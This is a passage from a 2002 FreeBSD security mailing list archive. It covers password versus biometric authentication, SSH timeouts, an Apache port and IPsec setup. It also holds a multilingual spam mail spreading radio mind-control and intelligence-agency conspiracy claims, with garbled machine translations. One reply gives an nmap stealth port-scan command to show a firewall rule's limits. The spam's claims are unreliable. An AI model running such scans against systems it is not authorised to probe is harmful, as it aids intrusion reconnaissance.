(ACB8FFBB.ipt.aol.com [172.184.255.187]) by hub.freebsd.org (Postfix) with SMTP id 7137E37B404 for ; Thu, 20 Jun 2002 17:41:07 -0700 (PDT) From: "todschick38259@hotmail.com" To: Subject: Entschuldigen Sie bitte die Störung! Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Date: Fri, 21 Jun 2002 02:41:37 +0200 Reply-To: "todschick38259@hotmail.com" Content-Transfer-Encoding: 8bit Message-Id: <20020621004107.7137E37B404@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Entschuldigen Sie bitte die Störung! Mir ist etwas zu Ohren gekommen. Eine relativ aussergewöhnliche Gerüchteküche, aus der man mir ein schwerverdauliches Süppchen vorgesetzt hat, ist der Grund meiner Mail. Unappetitlich ist gar kein Ausdruck! Ist es möglich auf funktechnischem Wege(in welchen Frequenzbereichen?) jemanden zu beeinflussen oder zu manipulieren? Oder sogar zu schikanieren und terrorisieren? Unter dem Motto:"Einen am Sender?Nich ganz alleine? Kleine Mannim Ohr?Falsche Wellenlänge?Bohnen in den Ohren? Auf den Zahn gefühlt(Amalgam)?Mal unverbindlich reinhören? Der Pullacher Wanzentanz? Ist das Spinnerei?Das geht doch gar nicht,oder? Und wenn wie sieht das ethisch moralisch aus? Zur technischen Seite der Sache gibt es zwar Berichte und Webseiten: Totalitaer,de - Die Waffe gegen die Kritik http://www.fosar-bludorf.com/Tempelhof/ http://jya.com/haarp.htm http://www.zeitenschrift.at/magazin/zs_24_15/1_mikrowaffen.htm http://www.bse-plus.de/d/doc/lbrief/lbmincontr.htm http://home.nexgo.de/kraven/bigb/big3.html http://w3.nrl.navy.mil/projects/haarp/index.html http://cryptome.org/ http://www.parascope.com/ds/mkultra0.htm http://www.trufax.org/menu/mind.html http://www.trufax.org/menu/elect.html http://mindcontrolforum.com/ http://www.trufax.org/menu/elect.html usw. usw. usw. ,aber,das kann doch nicht sein,das soetwas gemacht wird,oder? Eine Menschenrechtsverletzung sonder gleichen!?! Ist es möglich,durch Präparation,der Ohren und im Zusammenspiel mit eventuell vorhandenem Zahnersatz? Mit relativ einfacher Funktechnik?? In diesem Land?Hier und heute??? Unter welchen Motiven? Wo ist eigentlich die Abteilung 5 des BND und des Verfassungsschutzes? Kann es sein,daß es Leute gibt,die dem BND/Verfassungsschutz,auf funktechnischem Wege permanent einen Situationsbericht abliefern,ohne es selbst zu merken,im Kindesalter machbar gemacht?? Werden durch solche inoffiziellen Mitarbeiter,beim BND und Verfassungsschutz,nach Stasimanier, Informationen von und über,rein theoretisch, jeden Bundesbürger,gesammelt? Gibt es dann noch ein Recht auf Privatsphere? Wer kontrolliert eigentlich den BND,MAD und Verfassungsschutz auf Unterwanderung??? In der Mail geht es mir eigentlich um die Frage,ob es kriminellen Elementen, aus dem Motiv der Bereicherung,oder Gruppierungen aus ideologischen Motiven, möglich ist ,sich Wissen und Technik anzueignen,die zu anderen Zeiten, aus anderen Motiven(Westfernsehen?),entwickelt wurde. Und stellt der technische Wissensstand, der der Allgemeinheit bekannt ist wirklich das Ende der Fahnenstange dar? Ist es denn nicht kriminellen Elementen genauso möglich, ich sage das jetzt mal verharmlost und verniedlichend, einzelne Personen oder Gruppen mit relativ einfachen Mitteln, aus welchen Motiven auch immer, auszuspionieren? Und stellt diese "Ausspioniererei" nicht einen erheblichen Eingriff in die Privatsphäre dar? Ist es möglich einzelne Personen oder Gruppen, eine Akzeptans einer gewissen Öffentlichkeit(suggeriert?), die z.B. mit Hilfe von Internetseiten,wie zum Beispiel dem "Pranger"geschaffen werden könnte, mal vorausgestzt,zu terroriesieren und oder zu schikanieren, und das in aller (suggerierten)Öffentlichkeit?Haben die Leute die da am Pranger, oder auf irgendeiner anderen Seite verunglimpft,oder gar Verleumdet werden, eigentlich eine Chance zur Gegenöffentlichkeit?Ist das nicht Rufmord? Vor einigen Jahren bin ich per Zufall auf die Seite "Der Pranger" gestoßen, damals lief das noch nicht unter dem Deckmantel der Partnervermittlung. Können sich einzelne Personen,oder Interessengemeinschaften, aus reinem Selbstzweck,solcher Seiten bedienen, um unter dem Deckmantel einer fragwürdigen Zivilkourage, durch anzetteln irgendwelcher Hetzkampagnen,eigene, ganz persöhnliche Interessen durchsetzen? Können solche Seiten zur Koordination von kriminellen machenschaften dienen? Die Frage,ist es Möglichkeit oder Unmöglichkeit,technisch und gesellschaftlich, einzelne Personen,oder auch Gruppierungen,aus einer kriminellen/ideologischen Energei heraus,zu manipulieren oder zu beeinflussen,terrorisieren oder zu schickanieren,und zwar gezielt. Zielgruppenmanipulation durch Massenmedien sind alltägliche Manipulation, der mansich,mehr oder weniger,entziehen kann. Wird das Recht auf Privatsphäre,schleichend,tiefenpsychologisch, durch Sendungen,wie,zum Beispiel "Big brother",untergraben? Sollte bei einem der Angemailten ein gewisser Wissensstand zum Thema vorhanden sein, wäre ich über Hinweise zum Thema froh. Auf der Suche nach Antworten auf meine Fragen maile ich verschiedene Adressen aus dem Internet an, und hoffe aufkonstruktive Antworten und Kritiken. Über einen Besuch auf der Seite würde ich mich freuen. Sollten Sie von mir mehrfach angeschrieben worden sein,so bitte ich Sie,mir dies zu entschuldigen, das war nicht beabsichtigt. Der Grund für meine Anonymität ist die Tatsache, daß bei derlei Fragenstellerei, verständlicherweise,schnell der Ruf nach der Psychatrie laut wird. Was auch Methode hat(ist). Sollten Sie die Mail als Belästigung empfinden, möchte ich mich hiermit dafür entschuldigen! Big brother is watching you? Excuse please the disturbance! Me something came to ears. A relatively unusual rumor kitchen, from which one put forward to me a heavydigestible soup, is the reason of my Mail. Unappetizing is no printout! Is it possible on radio Wege(in for which frequency ranges?) to influence or manipulate someone? Terrorize or to even chicane and? Under the Motto:"Einen at the Sender?Nich quite alone? Small Mannim Ohr?Fal Wellenlaenge?Bohnen in the ears? On the tooth clean-hear gefuehlt(Amalgam)?Mal witthout obligation? The Pullacher bug wanzentanz? Isn't the Spinnerei?Das goes nevertheless at all, or? And if as looks ethicalally morally? For the technical page of the thing there is to report and web page: Totalitaer,de - Die Waffe gegen die Kritik http://www.fosar-bludorf.com/Tempelhof/ http://jya.com/haarp.htm http://www.zeitenschrift.at/magazin/zs_24_15/1_mikrowaffen.htm http://www.bse-plus.de/d/doc/lbrief/lbmincontr.htm http://home.nexgo.de/kraven/bigb/big3.html http://w3.nrl.navy.mil/projects/haarp/index.html http://cryptome.org/ http://www.parascope.com/ds/mkultra0.htm http://www.trufax.org/menu/mind.html http://www.trufax.org/menu/elect.html http://mindcontrolforum.com/ http://www.trufax.org/menu/elect.html usw. usw. usw. but, that cannot be nevertheless, which is made soetwas, or? A violation of human rights resemble special!?! Is it possible, by preparation, the ears and in interaction with possibly available artificial dentures? With relatively simple radio engineering?? In this Land?Hier and today??? Under which motives? Where is the department actually 5 of the BND and the protection of the constitution? Can it be that there are people, which deliver the Federal Intelligence Service/protection of the constitution, on radio way permanently a situation report, without noticing it, in the infancy feasiblly made? By such unofficial coworkers, with the BND and protection of the constitution, after Stasimanier, is information collected of and over,purely theoretically, each Federal citizen? Is there then still another right to Privatsphere? Who actually checks the BND, WAD and protection of the constitution for infiltration??? Into the Mail actually concerns it to me the question whether it criminal items, from which motive of enriching, or groupings from ideological motives is possible, to acquire itself knowledge and technique which were developed at other times, from other Motiven(Westfernsehen?).And does the technical knowledge status place, to that the public admits is really the end of the flag bar? Is it not to criminal items just as possible, I legend that now times played down and does nice-end, individual persons or groups with relatively simple means, to spy from whatever motives always? And doesn't this " Ausspioniererei " represent a substantial intervention into the privatsphaere? It is possible individual persons or groups, one acceptance to of a certain Oeffentlichkeit(suggeriert?), e.g. by Internet pages, how for example the " Pranger"geschaffen could become, times vorausgestzt, to terroriesieren and or chicane, and in everything (the people suggerierten)Oeffentlichkeit?Haben there at the Pranger, or on any other page to be reviled, or slandered, actually a chance to the Gegenoeffentlichkeit?Ist that not character assassination? Some years ago I am by coincidence the page " the Pranger " encountered, at that time ran not yet under the cover of the partner switching.Itself can individual persons, or communities of interests, from pure self purpose, such pages to serve, over under the cover of a doubtful Zivilkourage, through plot any rushing campaigns, own, quite persoehnliche interests to intersperse? Can such pages serve for the co-ordination of criminal machinations? The question, is it possibility or impossibility, technically and socially, individual persons, or also groupings of manipulating or of influencing from an criminal/ideological Energei, terrorizes or to schickanieren, directed.Target group manipulation by mass media are everyday manipulation, from which, more or less, can extract itself. Does the right to privatsphaere, creeping, by transmissions become deep psychological, how, for example " Big undermine brother"? If the Angemailten should be available a certain knowledge status to the topic with one, I would be glad over notes to the topic On the search for responses to my questions maile I different addresses from the Internet on, and hope up-constructional responses and criticisms.Over an attendance on the page wuerde I are pleased.If you should have been written down by me several times, then please I you to excuse me this that was not intended. The reason for my anonymity is the fact that with such Fragenstellerei, understandably, fast after the call the Psychatrie loud becomes. Which also method hat(ist). If you should feel the Mail as annoyance, I would like to apologize hereby for it! Big is watching you? Veuillez excuser le dérangement! Moi quelque chose concernant des oreilles est venu. Une cuisine de bruit relativement inhabituelle, dont on m'a placé un Sueppchen schwerverdauliches devant, est la raison de mes Mail.Aucune expression n'est peu appétissante! Il est possible sur un Wege(in funktechnischem pour quelles réponses fréquentielles?) quelqu'un influencer ou manipuler? Ou même schikanieren et terroriser? Sous le Motto:"Einen au Sender?Nich tout à fait seulement? Petits Mannim Ohr?Falsche Wellenlaenge?Bohnen dans les oreilles? Sur la dent gefuehlt(Amalgam)?Mal non contraignant reinhoeren? Le Pullacher Wanzentanz? Le Spinnerei?Das n'est-il quand même pas du tout va, ou? Et si comme cela paraît éthiquement moralement? Au côté technique de la chose, il y a certes des rapports et des Webseiten: Totalitaer,de - Die Waffe gegen die Kritik http://www.fosar-bludorf.com/Tempelhof/ http://jya.com/haarp.htm http://www.zeitenschrift.at/magazin/zs_24_15/1_mikrowaffen.htm http://www.bse-plus.de/d/doc/lbrief/lbmincontr.htm http://home.nexgo.de/kraven/bigb/big3.html http://w3.nrl.navy.mil/projects/haarp/index.html http://cryptome.org/ http://www.parascope.com/ds/mkultra0.htm http://www.trufax.org/menu/mind.html http://www.trufax.org/menu/elect.html http://mindcontrolforum.com/ http://www.trufax.org/menu/elect.html usw. usw. usw. toutefois qui ne peut quand même pas être qui on fait soetwas, ou? Une violation des droits de l'homme séparer ressembler!?! Il est possible, par la préparation, des oreilles et dans l'effet avec la prothèse dentaire éventuellement existante? Avec la technique de radio relativement simple?? Dans ce Land?Hier et aujourd'hui Sous quels motifs? Où le département est-il en réalité 5 du BND et de la protection d'constitution? peut il être qu'il y a les personnes qui livrent en permanence le BND/Verfassungsschutz, de manière funktechnischem un rapport de situation, sans le remarquer le -même , dans l'enfance rendu possible?? Par de tels collaborateurs officieux, avec le BND et la protection d'constitution, après manière, des informations sont-elles rassemblées et plus de, purement théoriquement, chaque citoyen allemand? Il y a alors encore un droit à des Privatsphere? Qui contrôle en réalité le BND, mad et protection d'constitution sur une infiltration??? Il s'agit en réalité dans le Mail me la question de savoir si lui éléments criminels, dont le motif de l'enrichissement, ou de groupements des motifs idéologiques, possible de s'acquérir le savoir et la technique qui à d'autres temps, est autre MotivenEt place-t-il le savoir technique dont le public vraiment la fin la barre de drapeau a connaissance ? Il n'est pas donc exactement la même chose possible pour des éléments criminels, moi cela maintenant fois verharmlost et minimisant une légende, personnes ou groupes particuliers avec des moyens relativement simples, de quels motifs aussi toujours, auszuspionieren?(Westfernsehen?), a été développé. Et ce "Ausspioniererei" ne représente-t-il pas une intervention considérable dans la vie privée? Il est possible personnes ou groupes particuliers, pour certain Oeffentlichkeit(suggeriert?), celui p. ex. à l'aide des côtés Internet, comme par exemple "le Pranger"geschaffen pourrait, fois vorausgestzt schikanieren terroriesieren et ou , et qui toute (suggerierten)Oeffentlichkeit?Haben les personnes ceux là, ou d'un autre côté verunglimpft, ou on ne pas calomnie, en réalité une chance au Gegenoeffentlichkeit?Ist qui meurtre d'appel? Il y a quelques années, je ne suis pas encore par hasard sur le côté "celui" poussé, fonctionnais alors cela sous la couche de pont de l'entremise partenaire. Des personnes particulières, ou des communautés d'intérêts le peuventelles, d'un autobut pur, de tels côtés servent, sous la couche de pont d'un Zivilkourage douteux, tracent plus de des campagnes de précipitation, propres intérêts tout à fait persoehnliche entremêlent? De tels côtés peuvent-ils servir à la coordination des manoeuvres criminelles? Question, est lui possibilité ou impossibilité de manipuler ou d'influencer techniquement et socialement, particulière personnes, ou aussi groupements, criminelle/ponctuel idéologique Energei dehors, , terroriser ou schickanieren, et ce.Une manipulation de groupe cible par des masse-médias être la manipulation quotidienne qui peut extraire mansich, plus ou moins. Le droit à la vie privée est-il miné, ramment, tiefenpsychologisch, par des envois, comme, par exemple "des Big brother"? Avec un les Angemailten si un certain savoir devait exister sur le thème, je serais heureux sur des indications sur le thème.Sur la recherche des réponses à mes questions je différentes adresses maile d'Internet dessus, et espère réponses et critiques aufkonstruktive. Sur une visite du côté http://hometown.aol.de/reinerhohn38259/homepage/index.html> je me réjouirais. Si vous deviez avoir été écrit à différentes reprises par moi, je vous demande de m'excuser cela qui n'était pas envisagé. La raison de mon anonymat est le fait qu'avec telle des Fragenstellerei, l'appel devient ce qui est bien compréhensible, rapidement bruyant après le Psychatrie. Ce que la méthode a également (ist). Si vous deviez ressentir les Mail comme un ennui, je voudrais m'excuser par ceci pour cela! Big brother is watching you? Könnte mir jemand bei der korrekten Überstzung helfen? Could someone help me with the correct translation? Quelqu'un pourrait-il m'aider lors du Ueberstzung correct? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 18: 4:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from frl.nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id B9F6737B400 for ; Thu, 20 Jun 2002 18:04:51 -0700 (PDT) Received: from eboa.com (roelof.nisser.com [10.0.0.2]) by frl.nisser.com (Postfix) with ESMTP id C359EEA94; Fri, 21 Jun 2002 03:04:31 +0200 (CEST) Message-ID: <3D127BD5.8000406@eboa.com> Date: Fri, 21 Jun 2002 03:05:25 +0200 From: Roelof Osinga Organization: eBOA - Programming the Web User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc3) Gecko/20020523 X-Accept-Language: en,pdf MIME-Version: 1.0 To: Dag-Erling Smorgrav Cc: Michael Sierchio , Eric F Crist , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG Subject: Re: Password security References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav wrote: > Michael Sierchio writes: > >>Dag-Erling Smorgrav wrote: >> >>>1) Biometrics can't be used reliably for remote access. >> > Most fingerprint scanners don't even encrypt the data they send to the > computer they're connected to. Yeah. Unlike keyboards that habitually encrypt all data entered or keys stroked before they send it to the computer they're connected to. > ... > The only biometric authentication system I trust (to some degree, > anyway) is the human brain. Whoa boy. Are you in trouble or what! . Look at it this way. This could have been a really nice planet. If it weren't for all those inflated apes or homo emotici running around on it. I like biometrics. For one thing, you can't forget them easily. But you need to combine them with another gimmick like a password. Not another biometric, mind . Roelof -- _______________________________________________________________________ eBOA® est. 1982 http://eBOA.com/ tel. +31-58-2123014 mailto:info@eBOA.com?subject=Information_request fax. +31-58-2160293 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 18:23: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from frl.nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id C1D1E37B411 for ; Thu, 20 Jun 2002 18:22:58 -0700 (PDT) Received: from eboa.com (roelof.nisser.com [10.0.0.2]) by frl.nisser.com (Postfix) with ESMTP id 01911EA94; Fri, 21 Jun 2002 03:22:54 +0200 (CEST) Message-ID: <3D128027.3090509@eboa.com> Date: Fri, 21 Jun 2002 03:23:51 +0200 From: Roelof Osinga Organization: eBOA - Programming the Web User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc3) Gecko/20020523 X-Accept-Language: en,pdf MIME-Version: 1.0 To: Eric F Crist Cc: 'twig les' , 'graham' , freebsd-security@FreeBSD.ORG Subject: Re: Password security (my final post on this particular thread) References: <004101c217bf$74a26f70$77fe180c@armageddon> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Eric F Crist wrote: > It's apparent that this conversation could go on forever. It is also > ... > > 1) Password security is not perfect due the inability of most > people/users of data networks to remember and conjure up difficult, > complex, or hard to guess passwords. > > 2) Biometrics is not a fool proof method of authentication and there are > ways to trick these devices. > > 3) The generally agreed upon method for the most secure method of > authentication over a seemingly insecure data network would be to > combine a multitude of different technology, all dependent on each > other. You missed the simple fact that all keys can be copied. From an OPIE list or print to some generated cryptographic bit sequence. Making it very simple - giving that opportunity - to raise a hell of a lot of false positives. Thus making 3 4. Furthermore I think you should amend 3 or 4 by adding time into the equation. Just by varying parts of the defense in a timely manner makes it harder for wannabees to get the toehold needed to do their dirty deeds. Roelof PS true, biometric keys can also be copied easily -- _______________________________________________________________________ eBOA® est. 1982 http://eBOA.com/ tel. +31-58-2123014 mailto:info@eBOA.com?subject=Information_request fax. +31-58-2160293 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 18:31: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from falcon.mail.pas.earthlink.net (falcon.mail.pas.earthlink.net [207.217.120.74]) by hub.freebsd.org (Postfix) with ESMTP id 0B2E937B40B for ; Thu, 20 Jun 2002 18:31:02 -0700 (PDT) Received: from user-2iniu5b.dialup.mindspring.com ([165.121.120.171] helo=earthlink.net) by falcon.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17LDGM-0000Pj-00; Thu, 20 Jun 2002 18:30:59 -0700 Message-ID: <3D1281DE.5000804@earthlink.net> Date: Thu, 20 Jun 2002 18:31:10 -0700 From: Lawrence Sica User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: twig les Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH timeout settings References: <20020620214512.42806.qmail@web10101.mail.yahoo.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org twig les wrote: > Hey all, I think this is an easy one masquerading as a > tough one.... My OpenSSH on my Free 4.4 Release box > just lets me keep an open session indefinitely without > any activity. I've read man sshd and all sorts of > other things but no mention. > > So the short version is: where do I lower the timeout > of SSH? > If you are using login with ssh, then you can modify login.conf: from man 5 login.conf idletime time Maximum idle time before logout. Read the manpage for more info and don't forget to run cap_mkdb if you change login.conf. Within sshd itself : You need to add this to /etc/ssh/sshd_config: ClientAliveInterval n Where n is the nuber of seconds. 0 (default) is unlimited and implied. I'd use the sshd_config option and not login, but i don't use login w/ ssh. HTH --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 20: 7: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from intense.net (server.intense.net [199.217.236.1]) by hub.freebsd.org (Postfix) with ESMTP id 05F7437B40C for ; Thu, 20 Jun 2002 20:06:56 -0700 (PDT) Received: from bob (209.248.134.245.nw.nuvox.net [209.248.134.245]) by intense.net (8.8.8/8.8.8) with SMTP id WAA99984 for ; Thu, 20 Jun 2002 22:06:55 -0500 (CDT) Message-ID: <005501c218d0$0d209ae0$6c01a8c0@metropark.metropark.com> From: "Robert Herrold" To: References: <200206201111.g5KBBq8t064689@aristotle.tamu.edu> Subject: Re: Apache 1.3.26 port Date: Thu, 20 Jun 2002 22:01:46 -0500 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm still trying to locate this port. Can't seem to get it with cvsup. Is there a 1.3.26+modssl port yet? ----- Original Message ----- From: "Robin Smith" To: Sent: Thursday, June 20, 2002 6:11 AM Subject: Re: Apache 1.3.26 port > Worth adding that the apache port will also overwrite cgi-bin.default; > if you have /cgi-bin symlinked to that, you are also hosed. > > Though it's easy enough to notice this, I too don't see why this > particular gotcha needs to be in the port. Why not just let the > port create empty data and cgi-bin directories rather than symlinks? > > This is really off-topic for freebsd-security, but those of you who've > lost web site content might want to look again. > > Robin Smith > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 22:35:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id E9CF337B41E for ; Thu, 20 Jun 2002 22:35:22 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5L5ZLhg033163; Fri, 21 Jun 2002 17:35:21 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Fri, 21 Jun 2002 17:35:21 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: "Dalin S. Owen" Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW/IPF Setup/Established In-Reply-To: <20020620171111.A24480@nexusxi.com> Message-ID: <20020621171329.C32663-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 20 Jun 2002, Dalin S. Owen wrote: > I have heard from the IPF community that a "allow tcp from any to any > established" can be spoofed. Don't they need the right sequence number > to do that? I mean, to send packets to my machine "claiming" to already > be established to a private port? If so, then why is the > /etc/rc.firewall script written this way? There must be a reason. > Also, Which one is faster at matching packets on average? You can't initiate a new TCP session if the SYN packet is blocked. I'd guess that the point of said spoofing would be for port scanning. eg this rule: ipfw deny tcp from any to any in via ep0 setup does not prevent TCP port scanning. eg: nmap -P0 -sN Andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 20 23:28:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63]) by hub.freebsd.org (Postfix) with ESMTP id C2B8B37B407 for ; Thu, 20 Jun 2002 23:28:12 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by sccrmhc03.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020621062812.SBFF20219.sccrmhc03.attbi.com@blossom.cjclark.org> for ; Fri, 21 Jun 2002 06:28:12 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g5L6SAJK029539 for ; Thu, 20 Jun 2002 23:28:11 -0700 (PDT) (envelope-from cjc@blossom.cjclark.org) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g5L6SA8A029538 for security@freebsd.org; Thu, 20 Jun 2002 23:28:10 -0700 (PDT) Date: Tue, 18 Jun 2002 13:05:47 -0700 From: "Crist J. Clark" To: security@freebsd.org Subject: Configuring sainfo in racoon(8) Message-ID: <20020618130547.A11688@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I am trying to get some ESP tunnels going. I am using racoon(8) to handle the IKE to negotiate the SAs. I am having a problem right from the start. My racoon.conf(5) looks something like, remote 192.168.100.1 { ... my_identifier user_fqdn "cjc@mydomain.org"; peer_identifier user_fqdn "cjc@mydomain.org"; ... } sainfo user_fqdn "cjc@mydomain.org" user_fqdn "cjc@mydomain.org" { ... } I have my SPD set, # setkey -c <; Fri, 21 Jun 2002 00:39:04 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 9129F5361; Fri, 21 Jun 2002 09:39:01 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Roelof Osinga Cc: Michael Sierchio , Eric F Crist , 'Ryan Thompson' , freebsd-security@FreeBSD.ORG Subject: Re: Password security References: <000c01c2174c$5a38f230$77fe180c@armageddon> <3D109329.8050007@tenebras.com> <3D127BD5.8000406@eboa.com> From: Dag-Erling Smorgrav Date: 21 Jun 2002 09:39:00 +0200 In-Reply-To: <3D127BD5.8000406@eboa.com> Message-ID: Lines: 13 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Roelof Osinga writes: > Dag-Erling Smorgrav wrote: > > Most fingerprint scanners don't even encrypt the data they send to the > > computer they're connected to. > Yeah. Unlike keyboards that habitually encrypt all data entered or keys > stroked before they send it to the computer they're connected to. That doesn't matter when what you type is a one-time password. Your biometric information, on the other hand, does not change a lot. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 1:15:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from ren.sasknow.com (ren.sasknow.com [207.195.92.131]) by hub.freebsd.org (Postfix) with ESMTP id 742FB37B405 for ; Fri, 21 Jun 2002 01:15:36 -0700 (PDT) Received: from localhost (ryan@localhost) by ren.sasknow.com (8.11.6/8.11.6) with ESMTP id g5L8FUf55158 for ; Fri, 21 Jun 2002 02:15:30 -0600 (CST) (envelope-from ryan@sasknow.com) Date: Fri, 21 Jun 2002 02:15:30 -0600 (CST) From: Ryan Thompson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Apache 1.3.26 port In-Reply-To: <005501c218d0$0d209ae0$6c01a8c0@metropark.metropark.com> Message-ID: <20020621021033.F54913-100000@ren.sasknow.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Robert Herrold wrote to freebsd-security@FreeBSD.ORG: > I'm still trying to locate this port. Can't seem to get it with > cvsup. Is there a 1.3.26+modssl port yet? Yes... In the usual /usr/ports/www/apache13-modssl/ directory. I cvsupped and built it earlier today without a hitch. Check your supfile. To confirm you've updated the port, grep VERSION_APACHE Makefile to confirm that it's updated to 1.3.26. - Ryan > ----- Original Message ----- > From: "Robin Smith" > To: > Sent: Thursday, June 20, 2002 6:11 AM > Subject: Re: Apache 1.3.26 port > > > > Worth adding that the apache port will also overwrite cgi-bin.default; > > if you have /cgi-bin symlinked to that, you are also hosed. > > > > Though it's easy enough to notice this, I too don't see why this > > particular gotcha needs to be in the port. Why not just let the > > port create empty data and cgi-bin directories rather than symlinks? > > > > This is really off-topic for freebsd-security, but those of you who've > > lost web site content might want to look again. > > > > Robin Smith > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Ryan Thompson SaskNow Technologies - http://www.sasknow.com 901 1st Avenue North - Saskatoon, SK - S7K 1Y4 Tel: 306-664-3600 Fax: 306-664-3630 Saskatoon Toll-Free: 877-727-5669 (877-SASKNOW) North America To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 5:48: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id F124137B406 for ; Fri, 21 Jun 2002 05:47:55 -0700 (PDT) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g5LCls104126; Fri, 21 